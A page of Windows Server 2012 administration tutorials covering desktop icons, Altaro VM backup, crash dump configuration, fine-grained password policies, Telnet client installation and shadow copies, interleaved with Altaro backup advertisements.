Skip to main content

Free Webinar: Scripting & Automation in Hyper-V without System Center Virtual Machine Manager (SCVMM)

System Center Virtual Machine Manager (SCVMM) provides some great automation benefits for those organizations that can afford the hefty price tag. However, if SCVMM isn’t a cost effective solution for your business, what are you to do? While VMM certainly makes automation much easier, you can achieve a good level of automation with PowerShell and the applicable PowerShell modules for Hyper-V, clustering, storage, and more.

Click and Download Your Free Hyper-V or VMware backup solution Now!

Are you looking to get grips with automation and scripting?

Join Thomas Maurer, Microsoft Datacenter and Cloud Management MVP, who will use this webinar to show you how to achieve automation in your Hyper-V environments, even if you don’t have SCVMM.

Remember, any task you have to do more than once, should be automated. Bring some sanity to your virtual environment by adding some scripting and automation know-how to your toolbox.

Note: While the Webinar date has passed, you can still access the presentation and download all resources for free. Click below to access it:

Register for the webinar here:

hyper-v-altaro-free-webinar-scripting-automation-hyper-v-without-scvmm-1

About the presenter:

Thomas Maurer

Thomas Maurer works as a Cloud Architect at itnetx gmbh, a consulting and engineering company located in Bern/Switzerland, which has been awarded by Microsoft as “Microsoft Datacenter Partner of the Year for the past three years (2011,2012,2013). Thomas is focused on Microsoft Technologies, especially Microsoft Cloud Solutions based Microsoft System Center, Microsoft Virtualization and Microsoft Azure. This includes Microsoft Hyper-V, Windows Server, Storage, Networking and Azure Pack as well as Service Management Automation.

About the host:

Andrew Syrewicze

Andy is a Technical Evangelist for Altaro Software, providing technical marketing and pre-sales expertise. Prior to that Andy spent the last 12+ years providing technology solutions across several industry verticals including, education, fortune 500 manufacturing, healthcare and professional services working for MSPs and Internal IT Departments. During that time he became an expert in VMware, Linux, and Network Security, but his main focus over the last 7 years has been in Virtualization, Cloud Services and the Microsoft Server Stack, with an emphasis on Hyper-V.

  • Hits: 8788

How to Install Desktop Icons (Computer, User’s Files, Network, Control Panel) on Windows 2012 Server. Bring Back The Traditional Windows (7,8) Desktop Icons!

One of the first things IT Administrators and IT Managers notice after a fresh installation of Windows 2012 Server is that there are no Desktop Icons apart from the Recycle Bin. Desktop icons such as Computer, User’s Files, Network & Control Panel are not available by default. Desktop icons are now available through the Personalize menu, when right-clicking in an empty area on the desktop, however this menu option is not available by default.

windows-server-2012-display-desktop-icons-computer-network-user-files-1
Figure 1. Personalize Menu is not available by default on Windows 2012 Server

To bring back the Desktop icons, administrators must first install the Desktop Experience feature on Windows 2012 Server.

Running Windows 2012 Server in a virtual environment? Get an award-winning backup solution for Free!! Download Now!

Note: Once the Desktop Experience Feature is installed, the server will require a restart.

To do so, click on the Server Manager icon on the taskbar:

windows-server-2012-display-desktop-icons-computer-network-user-files-2

Figure 2. Server Manager icon on Windows 2012 Server taskbar

 Now select Add Roles and Features:

windows-server-2012-display-desktop-icons-computer-network-user-files-3

Figure 3. Selecting Add roles and features in Windows 2012 Server

 

Now, click Next on the Before you Begin page and at the Installation Type page select Role-based or feature-based installation. Next, select your server from the server pool and click Next:

windows-server-2012-display-desktop-icons-computer-network-user-files-4

Figure 4. Selecting our destination server

At the next window, click on Features located at the left side, do not select anything from the Server Roles which is displayed by default. Under Features, scroll down to User Interfaces and Infrastructure and click to expand it. Now tick Desktop Experience:

windows-server-2012-display-desktop-icons-computer-network-user-files-5

Figure 5. Selecting Desktop Experience under User Interfaces and Infrastructure

When Desktop Experience is selected, a pop up window will ask us to confirm the installation of a few additional services or features required. At this point, simply click on Add Features. Now click on Next and then the Install button.

This will install all necessary server components and add-ons:

windows-server-2012-display-desktop-icons-computer-network-user-files-6

Figure 6. Installation of server components and add-ons - Windows 2012 Server

Once complete, the server will require a restart. After the server restart, we can right-click in an empty area on our desktop and we’ll see the Personalize menu. Select it and then click on Change desktop icons from the next window:

windows-server-2012-display-desktop-icons-computer-network-user-files-7

Figure 7. Selecting Change desktop icons - Windows 2012 Server

Now simply select the desktop icons required to be displayed and click on OK:

windows-server-2012-display-desktop-icons-computer-network-user-files-8

Figure 8. Select Desktop icons to be displayed on Windows 2012 Server Desktop

Free Award-Winning Backup solution for VMware and Hyper-V virtualization environments. Click here!

This article showed how to enable Desktop Icons (Computer, User files, Network , Control Panel) on Windows 2012 Server. We explained this process using a step-by-step process and included all necessary screenshots to ensure a quick and trouble-less installation. For more Windows 2012 Server tutorials, visit our Windows Server Section.

  • Hits: 17043

Easy, Fast & Reliable Hyper-V & VMware Backup with Altaro's Free Backup Solution

windows-hyper-v-free-backup-1aAs more companies around the world adopt the virtualization technology to increase efficiency and productivity, Microsoft’s Hyper-V virtualization platform is continuously gaining ground in the global virtualization market, as is the need for IT departments to provide rock-solid backup solutions for their Hyper-V virtualized environment.

History has shown that backup procedures were always a major pitfall for most IT departments and companies. With virtualization environments, the need of a backup solution is more important than ever, especially when we consider that physical servers now host multiple virtual servers.

While creating a backup plan and verifying backups can become an extremely complicated and time-consuming process, Altaro has managed to deliver a backup solution that guarantees the backup process of the virtualized environment and ensures the data integrity of servers. Furthermore, Altaro’s backup solution is complimented with a simple recovery procedure, guaranteeing quick and easy recovery from the failure of any virtual machine and hypervisor host. 

What’s even better is that Altaro’s Hyper-V & VMware backup solution is completely free for a limited number of virtual servers!

Download your Free Hyper-V & VMware Altaro Backup Solution Now - Limited Offer!

Altaro Hyper-V & VMware backup is a feature-rich application that allows users to backup and restore VMs literally with just a few clicks. The user interface of Altaro VM backup is easy-to-use with all the necessary features to make the Hyper-V or VMware backup & restore process, an easy and simple task.

Main Features Of Altaro VM Backup

  • User-friendly easy to use admin console.
  • Supports Microsoft Windows Server 2012 R2, 2012, 2008 R2, Hyper-V & ESX/ESXi server core.
  • Backup virtual machines per schedule.
  • Restore single or multiple virtual machines to different Hyper-V/VMware host or same host.
  • Rename virtual machines while restoring the virtual machine to same host or different host.
  • Backup Linux VMs without shutting down the machine.
  • Secured backups with AES encryption.
  • Reduced backup file size with powerful compression.
  • Central Altaro Hyper-V backup management for multiple Hyper-V host.
  • File level restore allows you to mount backup up VHDs and restore individual files without actually restoring the whole virtual machine.
  • Business continuity with offsite backup with WAN acceleration.
  • Backup Exchange Server VM (Supports Exchange 2007, 2010, 2013) and can restore Exchange item level restore options.
  • Support backup for Hyper-V cluster shared volumes for larger deployments.
  • Support for Microsoft SQL Database VM backup.
  • Free for up to two Virtual Machines.
  • Extremely low pricing per host (not per socket) provides unbeatable value.

It is evident that Altaro Hyper-V backup provides a plethora of features that makes it a viable solution for companies of any size.

Altaro Hyper-V  Backup Installation Requirements

Installing the Altaro Hyper-V backup application is no different than installing any other windows application, it is very easy.
It is important to note that Altaro Hyper-V backup must be installed in Hyper-V host machine, and not a guest machine. Altaro Hyper-V supports the following host server editions:

  • Windows 2008 R2 (all editions)
  • Windows Hyper-V Server 2008 R2 (core installation)
  • Windows Server 2012 (all editions)
  • Windows Hyper-V Server 2012 (core installation)
  • Windows Server 2012 R2 (all editions)
  • Windows Hyper-V Server 2012 R2 (core installation)

Minimum system requirements of Altaro Hyper-V Backup are:

  • 350 MB Memory
  • 1 GB free Hard Disk space for Altaro Hyper-V Backup Program and Settings files
  • .NET Framework 3.5 on Windows Server 2008 R2
  • .NET Framework 4.0 on Windows Server 2012

Following is a list of supported backup destinations. This is where you would save the backup of your Hyper-V virtual machines:

  • USB External Drives
  • eSata External Drives
  • USB Flash Drives
  • Fileserver Network Shares using UNC Paths
  • NAS devices (Network Attached Storage) using UNC Paths
  • RDX Cartridges
  • PC Internal Hard Drives (recommended only for evaluation purposes)

Grab a Free Copy of VM Altaro Backup Solution Now!

Installing Altaro Hyper-V Backup Software

First step is to grap a fresh copy of Altaro’s Hyper-V backup application by downloading the application from Altaro’s website.
Run the installation file. We will receive the application’s welcome screen. Click Next  to continue through the next windows until the installation is finally complete.

windows-hyper-v-free-backup-1Figure 1. Installation Welcome Screen

After few moments, the installation completes. At this point, check the Launch Management Console and click Finish:
 

windows-hyper-v-free-backup-2 Figure 2. Altaro Hyper-V Installation Complete

At this point, Altaro Hyper-V Backup has been successfully installed on our Hyper-V server and is ready to run by ticking the Launch Management Console option and clicking on the Finish button.

Alternatively, Administrators can also install the Altaro Hyper-V Backup application on a workstation or different server, connect remotely to the Hyper-V server and perform all necessary configuration and backup tasks from there.

We found the ‘remote management’ capability extremely handy and proceeded to try it out on our Windows 7 workstation.
It’s worth noting that it makes no difference whether you select to run Altaro’s Hyper-V Backup directly on the Hyper-V host or remotely as we did.

After installing the application on our Windows 7 workstation, we ran it and entered the necessary details to connect with the Hyper-V host:

windows-hyper-v-free-backup-3Figure 3. Connecting to the Hyper-V Agent Remotely

Users running the application directly on the Hyper-V host would select the ‘This Machine’ option from above.

Once connected the Hyper-V agent, the Altaro Hyper-V Backup main screen appears:


windows-hyper-v-free-backup-4 Figure 4. Altaro Hyper-V Backup - Main Screen (click to enlarge)

Altaro’s Hyper-V Backup solution offers an extensive number of options. When running the application for the first time, it provides a quick 3-step guide to help quickly setup a few mandatory options and begin performing your first Hyper-V backup in just a couple of minutes!  

In our upcoming articles, we’ll be taking a closer look on how Altaro’s Hyper-V Backup application manages to make life easy for Virtualization administrators, with its easy backup and restore procedures.

Summary

This article introduced Altaro’s Hyper-V Backup application – a complete backup and restore solution that manages to take away the complexity of managing backup and restore procedures for any size Hyper-V virtualization environment. Altaro’s Hyper-V Backup solution is completely FREE for a limited number Virtual Machines!

  • Hits: 13472

Troubleshooting Windows Server 2012 R2 Crashes. Analysis of Dump Files & Options. Forcing System Server Crash (Physical/Virtual)

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-001aThere are umpteen reasons why your Windows Server 2012 R2 decides to present you with a Blue Screen of Death (BSOD) or the stop screen. As virtual machines become more prominent in enterprise environments, the same problems that plagued physical servers earlier are now increasingly being observed for crashes of virtual machines as well.

Microsoft designs and configures Windows systems to capture information about the state of the operating systems if a total system failure occurs, unlike a failure of an individual application. You can see and analyze the captured information in the dump files, the settings of which you can configure using the System Tool in the Control Panel. By default, BSOD provides minimal information about the possible cause of the system crash and this may suffice in most circumstances to help in identifying the cause of the crash.

However, some crashes may require a deeper level of information than what the stop screen provides – for example, when your server simply hangs and becomes unresponsive. In that case, you may still be able to see the desktop, but moving the mouse or pressing keys on the keyboard produces no response. To resolve the issue, you need a memory dump. This is basically a binary file that contains a portion of the server's memory just before it crashed. Windows Server 2012 R2 provides five options for configuring memory dumps.

SafeGuard your Hyper-V & VMware servers from unrecoverable crashes with a reliable FREE Backup – Altaro’s VM Backup. Download Now!

Different Types Of Memory Dump Files

1. Automatic Memory Dump

Automatic memory dump is the default memory dump that Windows Server 2012 R2 starts off with. This is really not a new memory dump type, but is a Kernel memory dump that allows the SMSS process to reduce the page file to be smaller than the size of existing RAM. Therefore, this System Managed page file now reduces the size of page file on disk.

2. Complete Memory Dump

A complete memory dump is a record of the complete contents of the physical memory or RAM in the computer at the time of crash. Therefore, this needs a page file that is at least as large as the size of the RAM present plus 1MB. The complete memory dump will usually contain data from the processes that were running when the dump was collected. A subsequent crash will overwrite the previous contents of the dump.

3. Kernel Memory Dump

The kernel memory dump records only the read/write pages associated with the kernel-mode in physical memory at the time of crash. The non-paged memory saved in the kernel memory dump contains a list of running processes, state of the current thread and the list of loaded drivers. The amount of kernel-mode memory allocated by Windows and the drivers present on the system define the size of the kernel memory dump.

4. Small Memory Dump

A small memory dump or a MiniDump is a record of the stop code, parameters, list of loaded device drivers, information about the current process and thread, and includes the kernel stack for the thread that caused the crash.

5. No Memory Dump

Sometimes you may not want a memory dump when the server crashes.

Configuring Dump File Settings

Windows Server 2012 R2 allows you to configure an Automatic memory dump. To start the configuration, you have to log in as a local administrator and click on Control Panel in the Start menu:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-001 

Figure 1. Invoking the Windows Server Control Panel


From the Control Panel, click on System and Security icon. Next, click on System:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-002 

Figure 2. System and Security

In the System Properties that opens up, click on the Advanced tab as shown below:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-003 

Figure 3. System Properties – Advanced Tab

 In the Advanced System Properties, look for and click on Settings under Startup and Recovery section:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-004 

Figure 4. Startup and Recover dialog

 

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-005

Figure 5. The five types of debugging information (memory dumps) available

Here, you have the choice to let your server Automatically restart on System failure. Under Write Debugging information, you can select between one of the five types of memory dumps to be saved in the event of a server crash.
 
You can also define the name of the dump file the server should create and specify its location. The default location is in the System Root and the default name of the file is MEMORY.DMP. If you do not want the previous file to be overwritten by the new dump file, remove the tick mark from Overwrite any existing file (visible in figure 4).

When done, you will need to restart the server for the changes to take place.

Manually Generating A Dump File

Although the server will create the dump files when it crashes, you do not have to wait indefinitely for the crash to occur. As described in Microsoft’s support pages Generating a System Dump via Keyboard and Forcing a System Crash via Keyboard, you can induce the server to crash with a select combination of keys. Of the several methods described by Microsoft, we will discuss the method via USB keyboards.

Forcing a System Crash From the Keyboard

Begin with a command prompt with administrative privileges. For this, begin with the Start menu and click on Command Prompt (Admin):

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-006

Figure 6. Invoking the Command Prompt with Elevated Privileges

In the command prompt window that opens, type in “regedit” to and hit Enter:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-007 

Figure 7. Opening and Editing the Windows Registry

This opens the Registry Editor screen. Now expand all the way to the following section:

HKEY_LOCAL_MACHINE\SYSTEM\CurrrentControlSet\Control\CrashControl

Right-click on CrashControl and create a new DWORD with the name CrashDumpEnabled which will appear in the right hand pane. Next, modify its value by right-clicking on CrashDumpEnabled in the right hand pane and selecting Modify:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-008

Figure 8. Editing the Registry. Modifying the new registry DWORD CrashDumpEnabled

In the Edit DWORD Value dialog that opens enter Value data as 1 and click on OK:

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-009

Figure 9. Editing the Value Data of CrashDumpEnabled

Next step is to go to the following registry location:

HKEY_LOCAL_MACHINE\SYSTEM\CurrrentControlSet\Services\kbdhid\Parameters

Right-click on Parameters and create a new DWORD with the name CrashOnCtrlScroll, which will appear in the right pane:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-010

Figure 10. Editing the Registry. Creating the new Registry DWORD CrashOnCtrlScroll

Now, modify the CrashOnCtrlScroll value by right-clicking on CrashOnCtrlScroll in the right pane and selecting Modify:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-011 

Figure 11. Modifying the Registry DWORD entry CrashOnCtrlScroll

 In the Edit DWORD Value dialog that opens, enter Value data as 1 and click on OK:

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-012

Figure 12. Editing the Value data of CrashOnCtrlScroll

Restart the server for the new values to take effect.

Next, to crash the server, press the combination of keys:

CTRL + SCROLL LOCK + SCROLL LOCK

Note: Press SCROLL LOCK key twice while holding down the CTRL key.

The server will crash and restart and should have created a new dump file.

Note: However, as described in the Microsoft support pages referred above, this method does not always work and for other methods, you can refer to additional Microsoft support pages here.

This article explained why Windows Server dump files are considered important and how we can configure Windows Server 2012 R2 to save crash dump files. We saw the different memory Dumps (Automatic Memory Dump, Complete Memory Dump, Kernel Memory Dump, Small Memory Dump, No Memory Dump) and how to configure the dump’s settings. More articles on Windows Server 2012 can be found in our Windows Server 2012 Section.

  • Hits: 80623

Installation and Configuration of Fine-Grained Password Policy for Windows Server 2012

windows-2012-install-setup-fine-grained-password-policy-01aMicrosoft introduced Fine-Grained Password Policy for the first time in Windows Server 2008 and the policy has been part of every Windows Server since then. Fine-Grained Password Policy allows overcoming the limitations of only one password policy for a single domain. A brief example is that we apply different password and account lockout policies to different users in a domain with the help of Fine-Grained Password Policies.
 
This article discusses the Fine-Grained Password Policy as applicable to Windows Server 2012, and the different ways of configuring this policy. Windows Server 2012 allows two methods of configuring the Fine-Grained Password Policy:

1. Using the Windows PowerShell

2. Using the Active Directory Administrative Center or ADAC

In earlier Windows Server editions, it was possible to configure Fine-Grained Password Policy only through the command line interface (CLI). However with Windows Server 2012 a graphical user interface has been added, allowing the configuration of the Fine-Grained Password Policy via the Active Directory Administrative Center. We will discuss both the methods.

Before you begin to implement the Fine-Grained Password Policy, you must make sure the domain functional level must be Windows Server 2008 or higher. Refer to relevant Windows 2012 articles on our website Firewall.cx.

Backup your Windows Server 2012 R2 host using Altaro’s Free Hyper-V & VMware Backup solution. Download Now!

Configuring Fine-Grained Password Policy From Windows PowerShell

Use your administrative credentials to login to your Windows Server 2012 domain controller. Invoke the PowerShell console by Right clicking on the third icon from the left in the taskbar on the Windows Server desktop and then clicking on Run as Administrator.

windows-2012-install-setup-fine-grained-password-policy-01

Figure 1. Executing Windows PowerShell as Administrator

Clicking on Yes to the UAC confirmation will open up an Administrator: Windows PowerShell console.

Within the PowerShell console, type the following command in order to begin the creation of a new fine grained password policy and press Enter:

C:\Windows\system32> New-ADFineGrainedPasswordPolicy

windows-2012-install-setup-fine-grained-password-policy-02

Figure 2. Creating a new Fine Grained Password Policy via PowerShell

Type a name for the new policy at the Name: prompt and press Enter. In our example, we named our policy FGPP:

windows-2012-install-setup-fine-grained-password-policy-03

Figure 3. Naming our Fine Grained Password Policy

Type a precedence index number at the Precedence: prompt and press Enter. Note that policies that have a lower precedence number have a higher priority over those with higher precedence numbers. We’ve set our new policy with a precedence of 15: windows-2012-install-setup-fine-grained-password-policy-04

Figure 4. Setting the Precedence index number of our Fine Grained Password Policy

Now the policy is configured, but has all default values. If there is need to add specific parameters to the policy, you can do that by typing the following at the Windows PowerShell command prompt and press Enter:

C:\Windows\system32> New-ADFineGrainedPasswordPolicy -Name FGPP -DisplayName FGPP -Precedence 15 -ComplexityEnabled $true -ReversibleEncryptionEnabled $false -PasswordHistoryCount 20 -MinPasswordLength 10 -MinPasswordAge 3.00:30:00 -MaxPasswordAge 30.00:30:00 -LockoutThreshold 4 -LockoutObservationWindow 0.00:30:00 -LockoutDuration 0.00:45:00

In the above command, replace the name FGPP with the name of your password policy, which in our example is FGPP.

The parameters used in the above are mandatory and pretty much self-explanatory:

Attributes for Password Settings above include:

  • Enforce password history
  • Maximum password age
  • Minimum password age
  • Minimum password length
  • Passwords must meet complexity requirements
  • Store passwords using reversible encryption

Attributes involving account lockout settings include:

  • Account lockout duration
  • Account lockout threshold
  • Reset account lockout after


To apply the policy to a user/group or users/groups, use the following command at the PowerShell command prompt:

C:\Windows\system32> Add-ADFineGrainedPasswordPolicySubject -Identity FGPP -Subjects “Chris_Partsenidis”

For confirming whether the policy has indeed been applied to the groups/users correctly, type the following command at the PowerShell command prompt and press Enter:

C:\Windows\system32> Get-ADFineGrainedPasswordPolicy -Filter { name -like “FGPP” }

Remember, it is necessary to replace FGPP in the above with the name of your password policy. Also replace Chris_Partsenidis with the name of the group or user to whom you want to apply the policy.

The screenshot below shows the execution of the commands and output:

 windows-2012-install-setup-fine-grained-password-policy-05

Figure 5. Applying and verifying a Fine Grained Password Policy to a User or Group

Check the AppliesTo section from the output to verify if the policy is applied to the intended user or group.

Configuring Fine-Grained Password Policy Using The Active Directory Administrative Center (ADAC)

Use your administrative credentials to login to your Windows Server 2012 domain controller. Invoke the Server Manager Dashboard by left-clicking on the second icon in the taskbar on the Windows Server desktop:

windows-2012-install-setup-fine-grained-password-policy-06

Figure 6. Opening Server Manager Dashboard

In the Server Manager Dashboard, go to the top right hand corner, click on Tools and then click on Active Directory Administrative Center:

windows-2012-install-setup-fine-grained-password-policy-07

Figure 7. Launching Active Directory Administrative Center

Once the Active Directory Administrative Center screen is open, from the left panel, select the Active Directory (local) to expand.

In our example, the active directory is firewall (local). Locate Systems, expand it and click on Password Settings Container:

windows-2012-install-setup-fine-grained-password-policy-08

Figure 8. Locating the Password Settings Container

On the right panel, under Tasks and Password Settings Container, click on New:

windows-2012-install-setup-fine-grained-password-policy-09

Figure 9. Accessing Password Settings Container

Now click on Settings, which will open up the Create Password Settings screen. Enter a name for the Fine-Grained Password Policy and a number for its precedence.

For our example, we are using the name FGPP or Firewall Group Password Policy with a precedence index of 15. Also, configure the remainder of the policy settings as required:

windows-2012-install-setup-fine-grained-password-policy-010 
Figure 10. Configuring settings for our FGPP Policy

Once satisfied with the settings, click on Add at the bottom right hand corner. This will open up the Select Users or Groups dialog.

Click on Object Types to select either Users or Groups or both. Click on Locations to select the domain, which in our case is firewall.local.

Under the object names to select, type the name of the group or user on whom you want to apply the password policy. In our example, this is Chris_Partsenidis as shown below:

windows-2012-install-setup-fine-grained-password-policy-011

Figure 11. Selecting the Active Directory object to which the Fine Grained Password Policy will be applied to

Click on OK, and you will return to the Create Password Settings screen, which will now have the new name FGPP on top and the name of the user (to whom the policy will apply) at the bottom:

windows-2012-install-setup-fine-grained-password-policy-012

Figure 12. Our Fine Grained Password Policy

Click on OK to complete the process and go back to the Active Directory Administrative Center, which will now show the new Password Settings Container with the name FGPP and the precedence index in the center panel:

windows-2012-install-setup-fine-grained-password-policy-013

Figure 13. Our Fine Grained Password Policy appearing in the Password Settings Container

To modify any parameter, double click on the Password Settings Container in the central panel. Finally, when you are done, close the Active Directory Administrative Center window.

This article covered the installation and configuration of Fine-Grained Password Policies for Windows Server 2012. We explained how Fine-Grained Password Policies can be installed via PowerShell and the Active Directory Administrative Center. Our step-by-step guide shows all the necessary details to ensure a successful installation and configuration. More high-quality articles can be found in visit our Windows 2012 Section.

  • Hits: 14019

How to Install/Enable Telnet Client for Windows Server 2012 via GUI, Command Prompt and PowerShell

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-00IT professionals frequently need connectivity and management tools. The Telnet Client is one of the most basic tools for such activities. Using this tool, you can connect to a remote Telnet server and run applications on it. This is also a very useful tool for testing the connectivity to remote servers, such as those running SMTP services, web services and so on. In this article we will discuss how to install or enable Telnet client for Windows Server 2012, using the GUI interface or command prompt.

Microsoft operating systems since Windows NT have included the Telnet client as a feature. However, later Operating Systems beginning with the Windows Server 2008 and Windows Vista prefer not to enable it by default. Although you can always use a third-party tool for assisting you in remote connections and for troubleshooting connectivity, you can enable the Telnet client on your Windows Server 2012 any time needed.

Backup your Windows Server 2012 R2 host using Altaro’s Free Hyper-V & VMware Backup solution. Download Now!

Primarily, there are three ways you can install or enable the Telnet client for Windows Server 2012. You can install the Telnet client from the Graphical User Interface, Windows command prompt or from PowerShell. We will discuss all the methods in this article.

Installing Telnet Client From The GUI

Invoke the Server Manager by clicking on the second icon on the bottom taskbar on the desktop of the Windows Server 2012 R2:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-01

Figure 1. Launching Windows Server Dashboard

On the Dashboard, click on Add Roles and Features, which opens the Add roles and features wizard:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-02 
Figure 2. Selecting Add roles and features on Windows Server 2012

Click on Installation Type and select Role Based or Feature Based Installation. Click on Next to proceed:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-03

Figure 3. Selecting Installation Type – Role-based or feature-based installation

On the next screen, you can Select a server from the server pool. We select the server FW-DC1.firewall.local:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-04 
Figure 4. Selecting our server, DC1.firewall.local

Clicking on Next brings you to the Server Roles screen. As there is nothing to be done here, click on Next to continue to the Features screen. Now Scroll down under the Features until you arrive at the Telnet Client. Click within the box in front of the entry Telnet Client to select it, then click on Next to continue:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-05

Figure 5. Selecting the Telnet client for installation

The following screen asks you to Confirm Installation Selections. Click the Restart the destination server automatically if required tick box and click on Yes to confirm the automatic restart without notifications. Finally, click on Install to start the installation of the Telnet Client:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-06

Figure 6. Final confirmation and initiation of the Windows Telnet Client installation

Once completed, the Results screen will inform the success or failure of the process:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-07

Figure 7. Successful installation of Windows Server Telnet Client

Click on Close to end the installation and return to the Server Manager screen.

Running a Windows Hyper-V or VMware server? Hyper-V & VMware backup made easy with Altaro’s Free VM Backup solution. Download Now!

Installing Telnet Client From The Command Prompt

You need to invoke the Command Prompt window as an Administrator. For this, right click on the Windows Start icon located on the lower left corner on the desktop taskbar, then Click on Command Prompt (Admin) and click on Yes to the User Account Control query that opens up.

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-08

Figure 8. Launching a Command Prompt with Administrator privileges

 Once the Administrator: Command Prompt window opens, type the following command and press Enter:

C:\Windows\system32>dism /online /Enable-Feature /FeatureName:TelnetClient

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-09

Figure 9. Installing Telnet Client via Elevated Command Prompt

The command prompt will provide a real-time update within the command prompt window and inform you once the Telnet Client has been successfully installed.

To exit the command prompt window, simply click on the X button (top right corner) or type Exit and press Enter.

Note: It is possible to also install Windows Telnet Client on Windows 8 & Windows 8.1 using the same commands at the Command Line Prompt or PowerShell interface.

Installing Telnet Client From PowerShell

You need to invoke the PowerShell with elevated permissions, i.e., run as Administrator. For this, right click on the third icon from the left on the bottom taskbar on the desktop of the Windows Server 2012 R2:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-010

Figure 10. Running PowerShell with Administrator privileges

Click on Run as Administrator and click on Yes to the User Account Control query that opens up.

Within the PowerShell window, type the following two commands, pressing Enter after each one:

PS C:\Windows\system32> Import-Module servermanager
PS C:\Windows\system32> Add-WindowsFeature telnet-client

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-011

Figure 11. Installing Telnet Client via PowerShell On Windows 2012 R2 Server

Windows PowerShell will commence installing Telnet Client and will inform you if the Telnet Client has been successfully installed and whether the server needs a restart.

Type Exit and press Enter to close the Windows PowerShell window.

This article showed how to install the Telnet Client on Windows Server 2012 R2 using the Windows GUI Interface, Elevated Command prompt and Windows PowerShell. For more exciting articles on Windows 2012 R2 server, visit our Windows 2012 Section.

  • Hits: 37485

How to Enable & Configure Shadow Copy for Shared Folders on Windows Server 2012 R2

When you shadow copy a disk volume, you are actually generating a snapshot of the changes made to the folders and files within the disk volume at a certain point in time. Windows 2012 R2 shadow copy feature allows taking snapshots at set intervals, so that users can revert and restore their folders and files to a previous version.

The shadow copy feature for backups is a much faster solution compared to the traditional backup solution. We should keep in mind that shadow copy is not meant as a replacement for the traditional backup process. The shadow copy process never copies all the files and folders, but only keeps track of the changes made to them. This is the reason shadow copy cannot replace the traditional backup process. Typically, shadow copies are useful in scenarios where one needs to restore an earlier version of files or folders.

To configure shadow copy of a shared folder in Windows Server 2012, at first, you have to enable the shadow copy feature on the disk volume containing the shared folder. The shadow copy process works only at volume level and not on individual files or directories. Additionally, it works only on NTFS volumes and not on FAT volumes. After generating a snapshot of the data, the server keeps track of changes occurring to the data.

Typically, the server stores the changes on the same volume as the original, but you can change the destination. Additionally, you can define the disk space allocated to shadow copies. As the allocated disk space fills up, the server deletes the oldest shadow copy snapshot, thereby making room for newer shadow copies. Once the server has deleted a shadow copy snapshot, you cannot retrieve it. Windows Server 2012 R2 can keep a maximum of 64 shadow copies per volume.

Running a Windows Hyper-V or VMware Server?  Hyper-V & VMware Backup made easy with Altaro’s Free VM Backup SolutionDownload Now!

Install File & Storage Services

The shadow copy feature requires prior installation of all the File and Storage Services. For installing or verifying the installation of all the File and Storage Services, logon to the server as a local administrator, go to the Server Manager Dashboard and click on Add Roles and Features.

windows-2012-shadow-copy-setup-generate-file-folder-01

Figure 1. Server Manager Dashboard

This opens the Add Roles and Features Wizard, wherein go to Server Selection to select the server on which you want to install the File and Storage Services:

windows-2012-shadow-copy-setup-generate-file-folder-02

Figure 2. Selecting our Windows 2012 R2 Server from the server pool

Click on Next and select Server Roles. Expand the File and Storage Services and the File and iSCSI Services. Check that tick marks are visible against all the services. Click on those missing the tick marks:

windows-2012-shadow-copy-setup-generate-file-folder-03

Figure 3. Selecting File & Storage Services, plus iSCSI Services for installation

Click Next four times until you arrive at Confirmation:

windows-2012-shadow-copy-setup-generate-file-folder-04

Figure 4. Add roles and Features – Final confirmation Window

Click on Install to enable all the File and Storage Services. Once the server has completed the installation, click on Close.

Enabling The Shadow Copy Feature

After having confirmed that the server has enabled all File and Storage Services, go to the server desktop and open the File Explorer. You can do this by pressing the WINDOWS+E keys together on your keyboard or by clicking on the fourth icon from left on the bottom toolbar on the Windows Server 2012 R2 desktop:

windows-2012-shadow-copy-setup-generate-file-folder-05 

Figure 5. Opening Windows File Explorer

We will enable shadow copy for the volume C:\. Within this volume, we have our folder C:\Users\Chris_Partsenidis_Share for which we would like to ensure shadow copy is enabled:

windows-2012-shadow-copy-setup-generate-file-folder-06

Figure 6. Location of the folder we will be using as a Shadow-Copy example

Right-click on the Local Disk or volume C:\ (Or any other volume depending on your requirements) and select Configure shadow copies from the drop-down menu:

windows-2012-shadow-copy-setup-generate-file-folder-07

Figure 7. How to enable Shadow Copy for a Windows Volume

When the UAC confirmation dialog box opens, confirm with Yes. This opens the screen for Shadow Copies. Under Select a volume, click to select the volume C:\ from the list or any other volume for which you want to turn on shadow copies. Now, click on Enable.

A confirmation dialog will appear to Enable Shadow Copies along with a warning about file servers with high I/O loads:

windows-2012-shadow-copy-setup-generate-file-folder-08

Figure 8. Enable Shadow Copy confirmation window

Click on Yes to complete the process. You will be returned to the Shadow Copies screen and under Shadow copies of the selected volume, you can see the newly created Shadow Copy for volume C:\:

windows-2012-shadow-copy-setup-generate-file-folder-09 

Figure 9. Viewing the status of Shadow Copy for our Volume

Click on Settings to open the Settings dialog. In the Settings dialog, under Maximum size, you can select either No limit for the space reserved or set a limit for it by selecting Use limit. Note that as stated in the dialog box, a minimum limit of 300MB is necessary for the space reserved for shadow copies:

windows-2012-shadow-copy-setup-generate-file-folder-10 

Figure 10. Setting the maximum size to be used by Shadow Copy for our volume

